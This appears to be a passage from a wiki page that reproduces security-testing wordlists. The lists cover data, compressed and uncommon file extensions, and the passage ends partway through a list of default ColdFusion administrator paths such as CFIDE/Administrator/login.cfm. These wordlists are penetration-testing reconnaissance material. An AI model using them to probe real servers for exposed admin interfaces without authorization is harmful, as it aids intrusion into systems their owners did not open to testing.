.lnt&lt;br /&gt;
.loc&lt;br /&gt;
.lp7&lt;br /&gt;
.lrf&lt;br /&gt;
.lrs&lt;br /&gt;
.lrx&lt;br /&gt;
.lsf&lt;br /&gt;
.lsl&lt;br /&gt;
.lsp&lt;br /&gt;
.lsr&lt;br /&gt;
.lst&lt;br /&gt;
.lsu&lt;br /&gt;
.lvm&lt;br /&gt;
.lw4&lt;br /&gt;
.ly&lt;br /&gt;
.m&lt;br /&gt;
.mag&lt;br /&gt;
.mai&lt;br /&gt;
.map&lt;br /&gt;
.masseffectprofile&lt;br /&gt;
.mat&lt;br /&gt;
.mbb&lt;br /&gt;
.mbf&lt;br /&gt;
.mbg&lt;br /&gt;
.mbl&lt;br /&gt;
.mbp&lt;br /&gt;
.mbx&lt;br /&gt;
.mc1&lt;br /&gt;
.mc9&lt;br /&gt;
.mcd&lt;br /&gt;
.md&lt;br /&gt;
.mdb&lt;br /&gt;
.mdc&lt;br /&gt;
.mdf&lt;br /&gt;
.mdl&lt;br /&gt;
.mdm&lt;br /&gt;
.mdn&lt;br /&gt;
.mdt&lt;br /&gt;
.mdx&lt;br /&gt;
.mdz&lt;br /&gt;
.mem&lt;br /&gt;
.menc&lt;br /&gt;
.met&lt;br /&gt;
.mex&lt;br /&gt;
.mfo&lt;br /&gt;
.mfp&lt;br /&gt;
.mgc&lt;br /&gt;
.mls&lt;br /&gt;
.mm&lt;br /&gt;
.mmap&lt;br /&gt;
.mmc&lt;br /&gt;
.mmf&lt;br /&gt;
.mmp&lt;br /&gt;
.mnc&lt;br /&gt;
.mng&lt;br /&gt;
.mnk&lt;br /&gt;
.mno&lt;br /&gt;
.mny&lt;br /&gt;
.mobi&lt;br /&gt;
.moho&lt;br /&gt;
.mosaic&lt;br /&gt;
.mox&lt;br /&gt;
.mpd&lt;br /&gt;
.mpj&lt;br /&gt;
.mpp&lt;br /&gt;
.mpt&lt;br /&gt;
.mpx&lt;br /&gt;
.mpz&lt;br /&gt;
.mq4&lt;br /&gt;
.ms10&lt;br /&gt;
.mth&lt;br /&gt;
.mtw&lt;br /&gt;
.mud&lt;br /&gt;
.muf&lt;br /&gt;
.mw&lt;br /&gt;
.mwf&lt;br /&gt;
.mws&lt;br /&gt;
.mwx&lt;br /&gt;
.mxd&lt;br /&gt;
.myd&lt;br /&gt;
.myi&lt;br /&gt;
.nb&lt;br /&gt;
.nc&lt;br /&gt;
.ndf&lt;br /&gt;
.ndk&lt;br /&gt;
.ndx&lt;br /&gt;
.net&lt;br /&gt;
.neta&lt;br /&gt;
.nfo&lt;br /&gt;
.nitf&lt;br /&gt;
.nmind&lt;br /&gt;
.not&lt;br /&gt;
.notebook&lt;br /&gt;
.np&lt;br /&gt;
.npl&lt;br /&gt;
.npt&lt;br /&gt;
.nrl&lt;br /&gt;
.ns2&lt;br /&gt;
.ns3&lt;br /&gt;
.ns4&lt;br /&gt;
.nsf&lt;br /&gt;
.ntx&lt;br /&gt;
.numbers&lt;br /&gt;
.nvl&lt;br /&gt;
.nyf&lt;br /&gt;
.oab&lt;br /&gt;
.obj&lt;br /&gt;
.odb&lt;br /&gt;
.odf&lt;br /&gt;
.odp&lt;br /&gt;
.ods&lt;br /&gt;
.odx&lt;br /&gt;
.oeaccount&lt;br /&gt;
.ofc&lt;br /&gt;
.ofm&lt;br /&gt;
.oft&lt;br /&gt;
.ofx&lt;br /&gt;
.omcs&lt;br /&gt;
.omp&lt;br /&gt;
.ond&lt;br /&gt;
.one&lt;br /&gt;
.oo3&lt;br /&gt;
.opf&lt;br /&gt;
.opx&lt;br /&gt;
.or2&lt;br /&gt;
.or3&lt;br /&gt;
.or4&lt;br /&gt;
.or5&lt;br /&gt;
.or6&lt;br /&gt;
.org&lt;br /&gt;
.orx&lt;br /&gt;
.otf&lt;br /&gt;
.otl&lt;br /&gt;
.otln&lt;br /&gt;
.ots&lt;br /&gt;
.out&lt;br /&gt;
.ov2&lt;br /&gt;
.ova&lt;br /&gt;
.ovf&lt;br /&gt;
.p96&lt;br /&gt;
.p97&lt;br /&gt;
.pab&lt;br /&gt;
.paf&lt;br /&gt;
.pan&lt;br /&gt;
.pbd&lt;br /&gt;
.pc&lt;br /&gt;
.pcap&lt;br /&gt;
.pcb&lt;br /&gt;
.pcr&lt;br /&gt;
.pd4&lt;br /&gt;
.pd5&lt;br /&gt;
.pdas&lt;br /&gt;
.pdb&lt;br /&gt;
.pdd&lt;br /&gt;
.pdm&lt;br /&gt;
.pds&lt;br /&gt;
.pdx&lt;br /&gt;
.peb&lt;br /&gt;
.pec&lt;br /&gt;
.pep&lt;br /&gt;
.pex&lt;br /&gt;
.pfc&lt;br /&gt;
.pfl&lt;br /&gt;
.phb&lt;br /&gt;
.phm&lt;br /&gt;
.pi&lt;br /&gt;
.pis&lt;br /&gt;
.pjx&lt;br /&gt;
.pka&lt;br /&gt;
.pkb&lt;br /&gt;
.pkh&lt;br /&gt;
.pks&lt;br /&gt;
.pkt&lt;br /&gt;
.pln&lt;br /&gt;
.plw&lt;br /&gt;
.pmo&lt;br /&gt;
.pmr&lt;br /&gt;
.pnproj&lt;br /&gt;
.pnpt&lt;br /&gt;
.pns&lt;br /&gt;
.pnt&lt;br /&gt;
.pod&lt;br /&gt;
.poi&lt;br /&gt;
.pos&lt;br /&gt;
.postal&lt;br /&gt;
.pot&lt;br /&gt;
.potm&lt;br /&gt;
.potx&lt;br /&gt;
.pp2&lt;br /&gt;
.ppf&lt;br /&gt;
.pps&lt;br /&gt;
.ppsx&lt;br /&gt;
.ppt&lt;br /&gt;
.pptm&lt;br /&gt;
.pptx&lt;br /&gt;
.prc&lt;br /&gt;
.pre&lt;br /&gt;
.prf&lt;br /&gt;
.prj&lt;br /&gt;
.prm&lt;br /&gt;
.prs&lt;br /&gt;
.psa&lt;br /&gt;
.psf&lt;br /&gt;
.psm&lt;br /&gt;
.pst&lt;br /&gt;
.ptb&lt;br /&gt;
.ptf&lt;br /&gt;
.ptk&lt;br /&gt;
.ptm&lt;br /&gt;
.ptn&lt;br /&gt;
.ptt&lt;br /&gt;
.ptz&lt;br /&gt;
.pvl&lt;br /&gt;
.pwd&lt;br /&gt;
.pxj&lt;br /&gt;
.pxl&lt;br /&gt;
.q07&lt;br /&gt;
.q08&lt;br /&gt;
.q09&lt;br /&gt;
.q3d&lt;br /&gt;
.qbw&lt;br /&gt;
.qdat&lt;br /&gt;
.qdf&lt;br /&gt;
.qdfm&lt;br /&gt;
.qel&lt;br /&gt;
.qfx&lt;br /&gt;
.qif&lt;br /&gt;
.qpb&lt;br /&gt;
.qpf&lt;br /&gt;
.qph&lt;br /&gt;
.qpm&lt;br /&gt;
.qpw&lt;br /&gt;
.qrp&lt;br /&gt;
.qsd&lt;br /&gt;
.ral&lt;br /&gt;
.rbt&lt;br /&gt;
.rcd&lt;br /&gt;
.rcg&lt;br /&gt;
.rdb&lt;br /&gt;
.rdf&lt;br /&gt;
.rdx&lt;br /&gt;
.ref&lt;br /&gt;
.ret&lt;br /&gt;
.rf1&lt;br /&gt;
.rfa&lt;br /&gt;
.rfo&lt;br /&gt;
.rge&lt;br /&gt;
.rgn&lt;br /&gt;
.rgo&lt;br /&gt;
.rmuf&lt;br /&gt;
.rnq&lt;br /&gt;
.rod&lt;br /&gt;
.rog&lt;br /&gt;
.roi&lt;br /&gt;
.rou&lt;br /&gt;
.rpp&lt;br /&gt;
.rpt&lt;br /&gt;
.rrt&lt;br /&gt;
.rsc&lt;br /&gt;
.rsd&lt;br /&gt;
.rsw&lt;br /&gt;
.rte&lt;br /&gt;
.rvt&lt;br /&gt;
.rwg&lt;br /&gt;
.rzb&lt;br /&gt;
.s85&lt;br /&gt;
.saf&lt;br /&gt;
.sam07&lt;br /&gt;
.sar&lt;br /&gt;
.sav&lt;br /&gt;
.sbd&lt;br /&gt;
.sbf&lt;br /&gt;
.sbq&lt;br /&gt;
.sbt&lt;br /&gt;
.sca&lt;br /&gt;
.scf&lt;br /&gt;
.sch&lt;br /&gt;
.sdb&lt;br /&gt;
.sdc&lt;br /&gt;
.sdf&lt;br /&gt;
.sdp&lt;br /&gt;
.sdq&lt;br /&gt;
.sds&lt;br /&gt;
.sen&lt;br /&gt;
.seo&lt;br /&gt;
.seq&lt;br /&gt;
.ser&lt;br /&gt;
.sgml&lt;br /&gt;
.sgn&lt;br /&gt;
.shp&lt;br /&gt;
.shs&lt;br /&gt;
.shx&lt;br /&gt;
.skc&lt;br /&gt;
.skv&lt;br /&gt;
.skx&lt;br /&gt;
.sle&lt;br /&gt;
.slk&lt;br /&gt;
.slp&lt;br /&gt;
.snapfireshow&lt;br /&gt;
.sonic&lt;br /&gt;
.soundpack&lt;br /&gt;
.spo&lt;br /&gt;
.sps&lt;br /&gt;
.spub&lt;br /&gt;
.spv&lt;br /&gt;
.sq&lt;br /&gt;
.sqd&lt;br /&gt;
.sql&lt;br /&gt;
.sqlite&lt;br /&gt;
.sqr&lt;br /&gt;
.sta&lt;br /&gt;
.stc&lt;br /&gt;
.stf&lt;br /&gt;
.stk&lt;br /&gt;
.stl&lt;br /&gt;
.stm&lt;br /&gt;
.stp&lt;br /&gt;
.str&lt;br /&gt;
.stt&lt;br /&gt;
.stw&lt;br /&gt;
.styk&lt;br /&gt;
.stykz&lt;br /&gt;
.swk&lt;br /&gt;
.sxc&lt;br /&gt;
.sxi&lt;br /&gt;
.sy3&lt;br /&gt;
.t01&lt;br /&gt;
.t02&lt;br /&gt;
.t03&lt;br /&gt;
.t04&lt;br /&gt;
.t05&lt;br /&gt;
.t06&lt;br /&gt;
.t07&lt;br /&gt;
.t08&lt;br /&gt;
.t09&lt;br /&gt;
.t2&lt;br /&gt;
.t3001&lt;br /&gt;
.tax2008&lt;br /&gt;
.tax2009&lt;br /&gt;
.tb&lt;br /&gt;
.tbk&lt;br /&gt;
.tbl&lt;br /&gt;
.tcc&lt;br /&gt;
.tcx&lt;br /&gt;
.tda&lt;br /&gt;
.tdl&lt;br /&gt;
.tdm&lt;br /&gt;
.tdt&lt;br /&gt;
.te&lt;br /&gt;
.te3&lt;br /&gt;
.teacher&lt;br /&gt;
.tef&lt;br /&gt;
.tet&lt;br /&gt;
.tfa&lt;br /&gt;
.tfd&lt;br /&gt;
.tfrd&lt;br /&gt;
.tjp&lt;br /&gt;
.tk3&lt;br /&gt;
.tkfl&lt;br /&gt;
.tmw&lt;br /&gt;
.tol&lt;br /&gt;
.topc&lt;br /&gt;
.tpb&lt;br /&gt;
.tps&lt;br /&gt;
.tr3&lt;br /&gt;
.tra&lt;br /&gt;
.trd&lt;br /&gt;
.trk&lt;br /&gt;
.trs&lt;br /&gt;
.trx&lt;br /&gt;
.tst&lt;br /&gt;
.tsv&lt;br /&gt;
.ttk&lt;br /&gt;
.txa&lt;br /&gt;
.txd&lt;br /&gt;
.txf&lt;br /&gt;
.uccapilog&lt;br /&gt;
.ud&lt;br /&gt;
.udb&lt;br /&gt;
.udeb&lt;br /&gt;
.uds&lt;br /&gt;
.ulf&lt;br /&gt;
.ulz&lt;br /&gt;
.update&lt;br /&gt;
.upoi&lt;br /&gt;
.usr&lt;br /&gt;
.uvf&lt;br /&gt;
.uwl&lt;br /&gt;
.val&lt;br /&gt;
.vbpf1&lt;br /&gt;
.vcd&lt;br /&gt;
.vce&lt;br /&gt;
.vcf&lt;br /&gt;
.vcs&lt;br /&gt;
.vdb&lt;br /&gt;
.vdx&lt;br /&gt;
.vfs&lt;br /&gt;
.vi&lt;br /&gt;
.vip&lt;br /&gt;
.vle&lt;br /&gt;
.vlg&lt;br /&gt;
.vmt&lt;br /&gt;
.voi&lt;br /&gt;
.vok&lt;br /&gt;
.vrd&lt;br /&gt;
.vscontent&lt;br /&gt;
.vsx&lt;br /&gt;
.vtx&lt;br /&gt;
.vxml&lt;br /&gt;
.w02&lt;br /&gt;
.wab&lt;br /&gt;
.wb1&lt;br /&gt;
.wb2&lt;br /&gt;
.wb3&lt;br /&gt;
.wdb&lt;br /&gt;
.wdq&lt;br /&gt;
.wea&lt;br /&gt;
.wfd&lt;br /&gt;
.wfm&lt;br /&gt;
.wgp&lt;br /&gt;
.wgt&lt;br /&gt;
.windowslivecontact&lt;br /&gt;
.wjr&lt;br /&gt;
.wk1&lt;br /&gt;
.wk2&lt;br /&gt;
.wk3&lt;br /&gt;
.wk4&lt;br /&gt;
.wk5&lt;br /&gt;
.wke&lt;br /&gt;
.wki&lt;br /&gt;
.wks&lt;br /&gt;
.wku&lt;br /&gt;
.wlmp&lt;br /&gt;
.wmdb&lt;br /&gt;
.wor&lt;br /&gt;
.wpc&lt;br /&gt;
.wpf&lt;br /&gt;
.wpo&lt;br /&gt;
.wq1&lt;br /&gt;
.wq2&lt;br /&gt;
.wtb&lt;br /&gt;
.wtr&lt;br /&gt;
.xbk&lt;br /&gt;
.xdb&lt;br /&gt;
.xdp&lt;br /&gt;
.xds&lt;br /&gt;
.xef&lt;br /&gt;
.xem&lt;br /&gt;
.xfd&lt;br /&gt;
.xfo&lt;br /&gt;
.xft&lt;br /&gt;
.xl&lt;br /&gt;
.xlc&lt;br /&gt;
.xlgc&lt;br /&gt;
.xlr&lt;br /&gt;
.xls&lt;br /&gt;
.xlsb&lt;br /&gt;
.xlsm&lt;br /&gt;
.xlsx&lt;br /&gt;
.xlt&lt;br /&gt;
.xltm&lt;br /&gt;
.xltx&lt;br /&gt;
.xlw&lt;br /&gt;
.xmcd&lt;br /&gt;
.xml&lt;br /&gt;
.xmlper&lt;br /&gt;
.xmpz&lt;br /&gt;
.xpg&lt;br /&gt;
.xpj&lt;br /&gt;
.xpm&lt;br /&gt;
.xpt&lt;br /&gt;
.xrp&lt;br /&gt;
.xsl&lt;br /&gt;
.xslt&lt;br /&gt;
.xsn&lt;br /&gt;
.xtm&lt;br /&gt;
.xtp&lt;br /&gt;
.xxd&lt;br /&gt;
.yam&lt;br /&gt;
.zap&lt;br /&gt;
.zdb&lt;br /&gt;
.zdc&lt;br /&gt;
.zix&lt;br /&gt;
.zmc&lt;br /&gt;
.zpl&lt;br /&gt;
.{pb&lt;br /&gt;
.~hm&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Compressed File Types - (Update: 16 March 2010 - Total Statements: 187) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#  Compressed File Types - (Update: 16 March 2010 - Total Statements: 187)&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# creative commons&lt;br /&gt;
&lt;br /&gt;
.0&lt;br /&gt;
.000&lt;br /&gt;
.7z&lt;br /&gt;
.a00&lt;br /&gt;
.a01&lt;br /&gt;
.a02&lt;br /&gt;
.ace&lt;br /&gt;
.ain&lt;br /&gt;
.alz&lt;br /&gt;
.apz&lt;br /&gt;
.ar&lt;br /&gt;
.arc&lt;br /&gt;
.arh&lt;br /&gt;
.ari&lt;br /&gt;
.arj&lt;br /&gt;
.ark&lt;br /&gt;
.axx&lt;br /&gt;
.b64&lt;br /&gt;
.ba&lt;br /&gt;
.bh&lt;br /&gt;
.boo&lt;br /&gt;
.bz&lt;br /&gt;
.bz2&lt;br /&gt;
.bzip&lt;br /&gt;
.bzip2&lt;br /&gt;
.c00&lt;br /&gt;
.c01&lt;br /&gt;
.c02&lt;br /&gt;
.car&lt;br /&gt;
.cb7&lt;br /&gt;
.cbr&lt;br /&gt;
.cbt&lt;br /&gt;
.cbz&lt;br /&gt;
.cp9&lt;br /&gt;
.cpgz&lt;br /&gt;
.cpt&lt;br /&gt;
.dar&lt;br /&gt;
.dd&lt;br /&gt;
.deb&lt;br /&gt;
.dgc&lt;br /&gt;
.dist&lt;br /&gt;
.ecs&lt;br /&gt;
.efw&lt;br /&gt;
.epi&lt;br /&gt;
.f&lt;br /&gt;
.fdp&lt;br /&gt;
.gca&lt;br /&gt;
.gz&lt;br /&gt;
.gzi&lt;br /&gt;
.gzip&lt;br /&gt;
.ha&lt;br /&gt;
.hbc&lt;br /&gt;
.hbc2&lt;br /&gt;
.hbe&lt;br /&gt;
.hki&lt;br /&gt;
.hki1&lt;br /&gt;
.hki2&lt;br /&gt;
.hki3&lt;br /&gt;
.hpk&lt;br /&gt;
.hyp&lt;br /&gt;
.ice&lt;br /&gt;
.ipg&lt;br /&gt;
.ipk&lt;br /&gt;
.ish&lt;br /&gt;
.j&lt;br /&gt;
.jar.pack&lt;br /&gt;
.jgz&lt;br /&gt;
.jic&lt;br /&gt;
.kgb&lt;br /&gt;
.lbr&lt;br /&gt;
.lemon&lt;br /&gt;
.lha&lt;br /&gt;
.lnx&lt;br /&gt;
.lqr&lt;br /&gt;
.lz&lt;br /&gt;
.lzh&lt;br /&gt;
.lzm&lt;br /&gt;
.lzma&lt;br /&gt;
.lzo&lt;br /&gt;
.lzx&lt;br /&gt;
.md&lt;br /&gt;
.mint&lt;br /&gt;
.mou&lt;br /&gt;
.mpkg&lt;br /&gt;
.mzp&lt;br /&gt;
.oar&lt;br /&gt;
.p7m&lt;br /&gt;
.pack.gz&lt;br /&gt;
.package&lt;br /&gt;
.pae&lt;br /&gt;
.pak&lt;br /&gt;
.paq6&lt;br /&gt;
.paq7&lt;br /&gt;
.paq8&lt;br /&gt;
.par&lt;br /&gt;
.par2&lt;br /&gt;
.pbi&lt;br /&gt;
.pcv&lt;br /&gt;
.pea&lt;br /&gt;
.pet&lt;br /&gt;
.pf&lt;br /&gt;
.pim&lt;br /&gt;
.pit&lt;br /&gt;
.piz&lt;br /&gt;
.pkg&lt;br /&gt;
.pup&lt;br /&gt;
.puz&lt;br /&gt;
.pwa&lt;br /&gt;
.qda&lt;br /&gt;
.r0&lt;br /&gt;
.r00&lt;br /&gt;
.r01&lt;br /&gt;
.r02&lt;br /&gt;
.r03&lt;br /&gt;
.r1&lt;br /&gt;
.r2&lt;br /&gt;
.r30&lt;br /&gt;
.rar&lt;br /&gt;
.rev&lt;br /&gt;
.rk&lt;br /&gt;
.rnc&lt;br /&gt;
.rp9&lt;br /&gt;
.rpm&lt;br /&gt;
.rte&lt;br /&gt;
.rz&lt;br /&gt;
.rzs&lt;br /&gt;
.s00&lt;br /&gt;
.s01&lt;br /&gt;
.s02&lt;br /&gt;
.s7z&lt;br /&gt;
.sar&lt;br /&gt;
.sdc&lt;br /&gt;
.sdn&lt;br /&gt;
.sea&lt;br /&gt;
.sen&lt;br /&gt;
.sfs&lt;br /&gt;
.sfx&lt;br /&gt;
.sh&lt;br /&gt;
.shar&lt;br /&gt;
.shk&lt;br /&gt;
.shr&lt;br /&gt;
.sit&lt;br /&gt;
.sitx&lt;br /&gt;
.spt&lt;br /&gt;
.sqx&lt;br /&gt;
.sqz&lt;br /&gt;
.tar&lt;br /&gt;
.tar.gz&lt;br /&gt;
.tar.xz&lt;br /&gt;
.taz&lt;br /&gt;
.tbz&lt;br /&gt;
.tbz2&lt;br /&gt;
.tg&lt;br /&gt;
.tgz&lt;br /&gt;
.tlz&lt;br /&gt;
.tlzma&lt;br /&gt;
.txz&lt;br /&gt;
.tz&lt;br /&gt;
.uc2&lt;br /&gt;
.uha&lt;br /&gt;
.vem&lt;br /&gt;
.vsi&lt;br /&gt;
.wad&lt;br /&gt;
.war&lt;br /&gt;
.wot&lt;br /&gt;
.xef&lt;br /&gt;
.xez&lt;br /&gt;
.xmcdz&lt;br /&gt;
.xpi&lt;br /&gt;
.xx&lt;br /&gt;
.xz&lt;br /&gt;
.y&lt;br /&gt;
.yz&lt;br /&gt;
.z&lt;br /&gt;
.z01&lt;br /&gt;
.z02&lt;br /&gt;
.z03&lt;br /&gt;
.z04&lt;br /&gt;
.zap&lt;br /&gt;
.zfsendtotarget&lt;br /&gt;
.zip&lt;br /&gt;
.zipx&lt;br /&gt;
.zix&lt;br /&gt;
.zoo&lt;br /&gt;
.zpi&lt;br /&gt;
.zz&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Uncommon Data File Extensions  (Update: 16 March 2010 - Total Statements: 284) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# Uncommon Data File Extensions  (Update: 16 March 2010 - Total Statements: 284)&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# creative commons&lt;br /&gt;
&lt;br /&gt;
.3me&lt;br /&gt;
.3pe&lt;br /&gt;
.4dl&lt;br /&gt;
.8xk&lt;br /&gt;
.^^^&lt;br /&gt;
.aao&lt;br /&gt;
.ab2&lt;br /&gt;
.aca&lt;br /&gt;
.accdb&lt;br /&gt;
.acf&lt;br /&gt;
.acg&lt;br /&gt;
.agd&lt;br /&gt;
.an1&lt;br /&gt;
.anme&lt;br /&gt;
.arc&lt;br /&gt;
.arh&lt;br /&gt;
.ast&lt;br /&gt;
.att&lt;br /&gt;
.aw&lt;br /&gt;
.bafl&lt;br /&gt;
.bdf&lt;br /&gt;
.bfx&lt;br /&gt;
.bjo&lt;br /&gt;
.bld&lt;br /&gt;
.blg&lt;br /&gt;
.btf&lt;br /&gt;
.btif&lt;br /&gt;
.btr&lt;br /&gt;
.cct&lt;br /&gt;
.cdb&lt;br /&gt;
.cdd&lt;br /&gt;
.cdf&lt;br /&gt;
.cdp&lt;br /&gt;
.cdr&lt;br /&gt;
.chk&lt;br /&gt;
.ckd&lt;br /&gt;
.cl2&lt;br /&gt;
.cl4&lt;br /&gt;
.clb&lt;br /&gt;
.clix&lt;br /&gt;
.clm&lt;br /&gt;
.cmbl&lt;br /&gt;
.contact&lt;br /&gt;
.cpi&lt;br /&gt;
.cpmz&lt;br /&gt;
.csv&lt;br /&gt;
.cwz&lt;br /&gt;
.cxt&lt;br /&gt;
.daf&lt;br /&gt;
.dat&lt;br /&gt;
.data&lt;br /&gt;
.db&lt;br /&gt;
.dcf&lt;br /&gt;
.ddt&lt;br /&gt;
.dex&lt;br /&gt;
.dif&lt;br /&gt;
.dmsk&lt;br /&gt;
.dnc&lt;br /&gt;
.dpx&lt;br /&gt;
.dsd&lt;br /&gt;
.dt1&lt;br /&gt;
.dt2&lt;br /&gt;
.dta&lt;br /&gt;
.e00&lt;br /&gt;
.ec0&lt;br /&gt;
.edf&lt;br /&gt;
.eep&lt;br /&gt;
.efx&lt;br /&gt;
.enc&lt;br /&gt;
.enw&lt;br /&gt;
.epw&lt;br /&gt;
.est&lt;br /&gt;
.et&lt;br /&gt;
.eta&lt;br /&gt;
.ev3&lt;br /&gt;
.exif&lt;br /&gt;
.exp&lt;br /&gt;
.fbl&lt;br /&gt;
.fdb&lt;br /&gt;
.fid&lt;br /&gt;
.fol&lt;br /&gt;
.gdb&lt;br /&gt;
.gen&lt;br /&gt;
.gnp&lt;br /&gt;
.gpi&lt;br /&gt;
.gpx&lt;br /&gt;
.hcp&lt;br /&gt;
.hdf&lt;br /&gt;
.hmt&lt;br /&gt;
.hsk&lt;br /&gt;
.htg&lt;br /&gt;
.id2&lt;br /&gt;
.ii&lt;br /&gt;
.img&lt;br /&gt;
.ink&lt;br /&gt;
.ins&lt;br /&gt;
.irr&lt;br /&gt;
.irx&lt;br /&gt;
.iw&lt;br /&gt;
.jdb&lt;br /&gt;
.jnt&lt;br /&gt;
.job&lt;br /&gt;
.jrprint&lt;br /&gt;
.kmz&lt;br /&gt;
.lbx&lt;br /&gt;
.lex&lt;br /&gt;
.lgf&lt;br /&gt;
.lgl&lt;br /&gt;
.lib&lt;br /&gt;
.liveupdate&lt;br /&gt;
.lnt&lt;br /&gt;
.lst&lt;br /&gt;
.m&lt;br /&gt;
.masseffectprofile&lt;br /&gt;
.mat&lt;br /&gt;
.mbb&lt;br /&gt;
.mdb&lt;br /&gt;
.mem&lt;br /&gt;
.menc&lt;br /&gt;
.met&lt;br /&gt;
.mmf&lt;br /&gt;
.mng&lt;br /&gt;
.mpd&lt;br /&gt;
.mpp&lt;br /&gt;
.ms10&lt;br /&gt;
.muf&lt;br /&gt;
.mw&lt;br /&gt;
.mwf&lt;br /&gt;
.mwx&lt;br /&gt;
.nc&lt;br /&gt;
.ndx&lt;br /&gt;
.nfo&lt;br /&gt;
.not&lt;br /&gt;
.ns2&lt;br /&gt;
.ns3&lt;br /&gt;
.ns4&lt;br /&gt;
.ntx&lt;br /&gt;
.numbers&lt;br /&gt;
.ods&lt;br /&gt;
.oeaccount&lt;br /&gt;
.omcs&lt;br /&gt;
.or2&lt;br /&gt;
.or3&lt;br /&gt;
.or4&lt;br /&gt;
.or5&lt;br /&gt;
.orx&lt;br /&gt;
.out&lt;br /&gt;
.ov2&lt;br /&gt;
.ovf&lt;br /&gt;
.paf&lt;br /&gt;
.pbd&lt;br /&gt;
.pcr&lt;br /&gt;
.pdb&lt;br /&gt;
.pdx&lt;br /&gt;
.peb&lt;br /&gt;
.pec&lt;br /&gt;
.pfc&lt;br /&gt;
.pis&lt;br /&gt;
.pln&lt;br /&gt;
.pnpt&lt;br /&gt;
.pns&lt;br /&gt;
.pnt&lt;br /&gt;
.pos&lt;br /&gt;
.postal&lt;br /&gt;
.pps&lt;br /&gt;
.ppsx&lt;br /&gt;
.ppt&lt;br /&gt;
.pptm&lt;br /&gt;
.pptx&lt;br /&gt;
.pre&lt;br /&gt;
.prf&lt;br /&gt;
.psa&lt;br /&gt;
.psf&lt;br /&gt;
.pst&lt;br /&gt;
.ptz&lt;br /&gt;
.q07&lt;br /&gt;
.q3d&lt;br /&gt;
.qbw&lt;br /&gt;
.qdat&lt;br /&gt;
.qdf&lt;br /&gt;
.qfx&lt;br /&gt;
.qpf&lt;br /&gt;
.qpw&lt;br /&gt;
.qsd&lt;br /&gt;
.rcd&lt;br /&gt;
.rdx&lt;br /&gt;
.ref&lt;br /&gt;
.rmuf&lt;br /&gt;
.roi&lt;br /&gt;
.rrt&lt;br /&gt;
.rvt&lt;br /&gt;
.rwg&lt;br /&gt;
.saf&lt;br /&gt;
.sam07&lt;br /&gt;
.sbd&lt;br /&gt;
.sbf&lt;br /&gt;
.sbq&lt;br /&gt;
.sbt&lt;br /&gt;
.sdb&lt;br /&gt;
.sdc&lt;br /&gt;
.sdf&lt;br /&gt;
.sds&lt;br /&gt;
.ser&lt;br /&gt;
.sgn&lt;br /&gt;
.shs&lt;br /&gt;
.skc&lt;br /&gt;
.slk&lt;br /&gt;
.sonic&lt;br /&gt;
.soundpack&lt;br /&gt;
.spo&lt;br /&gt;
.sql&lt;br /&gt;
.stf&lt;br /&gt;
.stl&lt;br /&gt;
.stm&lt;br /&gt;
.sy3&lt;br /&gt;
.t08&lt;br /&gt;
.t09&lt;br /&gt;
.t2&lt;br /&gt;
.tax2009&lt;br /&gt;
.tdl&lt;br /&gt;
.tdt&lt;br /&gt;
.te&lt;br /&gt;
.teacher&lt;br /&gt;
.tmw&lt;br /&gt;
.tol&lt;br /&gt;
.trk&lt;br /&gt;
.trs&lt;br /&gt;
.trx&lt;br /&gt;
.tsv&lt;br /&gt;
.uccapilog&lt;br /&gt;
.ud&lt;br /&gt;
.udeb&lt;br /&gt;
.uds&lt;br /&gt;
.update&lt;br /&gt;
.uwl&lt;br /&gt;
.val&lt;br /&gt;
.vcf&lt;br /&gt;
.vdb&lt;br /&gt;
.vfs&lt;br /&gt;
.vip&lt;br /&gt;
.vle&lt;br /&gt;
.vlg&lt;br /&gt;
.vxml&lt;br /&gt;
.w02&lt;br /&gt;
.wab&lt;br /&gt;
.wb1&lt;br /&gt;
.wb3&lt;br /&gt;
.wdq&lt;br /&gt;
.wfd&lt;br /&gt;
.wfm&lt;br /&gt;
.windowslivecontact&lt;br /&gt;
.wk1&lt;br /&gt;
.wk2&lt;br /&gt;
.wk3&lt;br /&gt;
.wk4&lt;br /&gt;
.wk5&lt;br /&gt;
.wke&lt;br /&gt;
.wks&lt;br /&gt;
.wlmp&lt;br /&gt;
.wpc&lt;br /&gt;
.wpo&lt;br /&gt;
.wq1&lt;br /&gt;
.wq2&lt;br /&gt;
.wtr&lt;br /&gt;
.xbk&lt;br /&gt;
.xdb&lt;br /&gt;
.xds&lt;br /&gt;
.xfd&lt;br /&gt;
.xl&lt;br /&gt;
.xlgc&lt;br /&gt;
.xlr&lt;br /&gt;
.xls&lt;br /&gt;
.xlsx&lt;br /&gt;
.xltm&lt;br /&gt;
.xltx&lt;br /&gt;
.xml&lt;br /&gt;
.xmpz&lt;br /&gt;
.xsl&lt;br /&gt;
.xsn&lt;br /&gt;
.xtm&lt;br /&gt;
.xtp&lt;br /&gt;
.xxd&lt;br /&gt;
.{pb&lt;br /&gt;
.~hm&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cold Fusion Default Files - (Update: 16 March 2010 - Total Statements: 65) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#  Cold Fusion Default Files - (Update: 16 March 2010 - Total Statements: 65)&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# creative commons&lt;br /&gt;
&lt;br /&gt;
CFIDE/Administrator/&lt;br /&gt;
CFIDE/Administrator/index.cfm&lt;br /&gt;
CFIDE/Administrator/login.cfm&lt;br /&gt;
CFIDE/Administrator/Application.cfm&lt;br /&gt;
CFIDE/Application.cfm&lt;br /&gt;
CFIDE/adminapi/&lt;br /&gt;
CFIDE/adminapi/Application.cfm&lt;br /&gt;
CFIDE/adminapi/administrator.cfc&lt;br /&gt;
CFIDE/adminapi/base.cfc&lt;br /&gt;
CFIDE/adminapi/customtags/&lt;br /&gt;
CFIDE/adminapi/customtags/l10n.cfm&lt;br /&gt;
CFIDE/adminapi/customtags/resources&lt;br /&gt;
CFIDE/adminapi/customtags/resources/&lt;br /&gt;
CFIDE/adminapi/datasource.cfc&lt;br /&gt;
CFIDE/adminapi/debugging.cfc&lt;br /&gt;
